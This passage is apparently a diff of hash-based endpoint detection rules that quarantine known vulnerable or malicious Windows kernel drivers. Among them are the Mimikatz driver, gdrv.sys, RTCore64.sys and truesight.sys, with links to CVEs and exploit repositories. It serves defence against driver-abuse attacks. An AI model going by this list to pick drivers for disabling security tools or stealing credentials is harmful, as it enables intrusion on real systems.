"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29a90ae1dcee66335ece4287a06482716530509912be863c85a2a03a6450a5b6", + "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a043a402-37ff-5c76-9411-56fde8284dec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607543Z", + "creation_date": "2026-03-23T11:45:29.607545Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607551Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c5d7069f85ec1d6f58147431f88c4d7c48df73baf94ffdefd664f2606baf09c", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a04b8903-c331-57ef-afb7-5957517ed6eb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610934Z", + "creation_date": "2026-03-23T11:45:29.610936Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610948Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4b5aecfecf26145aadd23f96a1cdfae0bca4e53af215d4bd77bba5dcc5a4479b", + "comment": "CPUID CPU-Z vulnerable driver (aka 
cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a04c6128-0e7c-5459-ba1e-4a51909d4304", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616739Z", + "creation_date": "2026-03-23T11:45:29.616741Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616746Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b4cbd2bc16071a1868597ec86857dba1140f981e3e943b0857341daffff4e69", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a057a680-14a8-5655-9041-638f08c63463", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831180Z", 
+ "creation_date": "2026-03-23T11:45:30.831182Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831188Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14dd5543656d683dd6eaef643ac0e3b4e1eb1348db18d6109a6b1b75fe1dbc13", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a062e544-41ef-5a13-90ba-b767b319f5cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832334Z", + "creation_date": "2026-03-23T11:45:30.832336Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832341Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1fb086cf89933281486efa575a9412e496c99dbe1106ea6c48b077be389f92e4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a06de8ad-5f20-5428-b205-e3f0e17f7b44", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143528Z", + "creation_date": "2026-03-23T11:45:31.143530Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143535Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bc608516ecc4d8a265b066bd2f1a0178e4f2ab01dabec1e516b5840591c24965", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a07b3901-ca6b-53d1-afd4-65a39ecf83e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970483Z", + "creation_date": "2026-03-23T11:45:29.970487Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970495Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "627e13da6a45006fff4711b14754f9ccfac9a5854d275da798a22f3a68dd1eaa", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0828a38-d583-599b-b9ac-3d5579cec9c4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616168Z", + "creation_date": "2026-03-23T11:45:29.616170Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616175Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad6360cee0b1b293be38348f0f9deb7221e205516524f437aaf8f468b308cb4e", + "comment": "Phoenix Tech. 
vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0878cc9-d25b-5a4b-8104-7f8513246133", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824459Z", + "creation_date": "2026-03-23T11:45:30.824463Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824472Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ddd03e6455d92c7ef357f2834d70593ce65730306338a574416d9b439e2c3f0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0950a8e-9b78-5b8b-9367-a9a8a8a86e4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.985850Z", + "creation_date": "2026-03-23T11:45:29.985852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985857Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87565ff08a93a8ff41ea932bf55dec8e0c7e79aba036507ea45df9d81cb36105", + "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0a72fcb-873d-543f-ba98-7723f274ca7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811746Z", + "creation_date": "2026-03-23T11:45:31.811748Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811754Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "50f6c853251603e51534830d1d5faeb98ba638eafdb8d3cc4c49d56e28724325", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0a81360-2cbb-5274-9d86-677ae3f95e89", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605448Z", + "creation_date": "2026-03-23T11:45:29.605450Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605456Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6827cd3a8f273a66ecc33bb915df6c7dea5cc1b8134b0c348303ef50db33476", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0aa932b-78f9-580e-aa70-ca48c23f1b05", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609021Z", + "creation_date": "2026-03-23T11:45:29.609023Z", + "enabled": 
true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609029Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ce40a2cdd3f45c7632b858e8089ddfdd12d9acb286f2015a4b1b0c0346a572c", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0aec560-9bf9-5287-adb7-0319837d9216", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463069Z", + "creation_date": "2026-03-23T11:45:30.463073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463081Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "21617210249d2a35016e8ca6bd7a1edda25a12702a2294d56010ee8148637f5a", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0b5f422-34a6-5344-b3d5-9fa1fd109a5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.483468Z", + "creation_date": "2026-03-23T11:45:31.483472Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.483481Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9866199215604d3739dd8e240b802424f9da097ead62d424c5af3cac21597ead", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0be8b1b-7b35-5818-b139-3e6b94ca5dad", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608951Z", + "creation_date": "2026-03-23T11:45:29.608953Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608958Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "ff6729518a380bf57f1bc6f1ec0aa7f3012e1618b8d9b0f31a61d299ee2b4339", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0c0be80-3402-5d00-b21f-90a4b55ac2bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825193Z", + "creation_date": "2026-03-23T11:45:31.825196Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825204Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d66bc8d2614a775eabcf0a9c51bcde2f9037dafe20f0155eec87abecd8eeccab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0c66ed2-d510-57ed-8269-ab9fb2dd21ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489802Z", + "creation_date": "2026-03-23T11:45:31.489805Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489813Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6278724ed1c5287475fbd8888527160af10c3d83b610f0b058c1701f5aeda069", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0e315b9-561a-5e15-bf8a-dd97ac97a4e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606759Z", + "creation_date": "2026-03-23T11:45:29.606761Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606767Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2028156ea5a202f5fa9462646f3bffa0c01ac9c2e5cf6fa4df55bf38a47ac8da", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0e47ec1-a3e1-554a-a440-e717cdcf2c51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464815Z", + "creation_date": "2026-03-23T11:45:30.464818Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464826Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c7bccc6f38403def4690e00a0b31eda05973d82be8953a3379e331658c51b231", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0ead3fd-f628-5dce-9166-fbdc39f4e016", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975078Z", + "creation_date": "2026-03-23T11:45:29.975080Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.975085Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77955af8a8bcea8998f4046c2f8534f6fb1959c71de049ca2f4298ba47d8f23a", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0eea5ac-8281-5f75-9b04-fdf362b87d08", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155223Z", + "creation_date": "2026-03-23T11:45:31.155225Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155231Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6c8f95af644c5377d68503cee0ac723150e22bfb5717921fe9998bc0fd6de479", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"a0eec88d-5c71-5911-9518-68ccd55c3699", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827712Z", + "creation_date": "2026-03-23T11:45:31.827714Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827720Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e42b99a85e42eb6785ae7c45ab7f4104bc729498bb224124b3e45676ce2da08", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a0fcece0-44fb-58c4-add7-1d6a503cebc1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611659Z", + "creation_date": "2026-03-23T11:45:29.611661Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
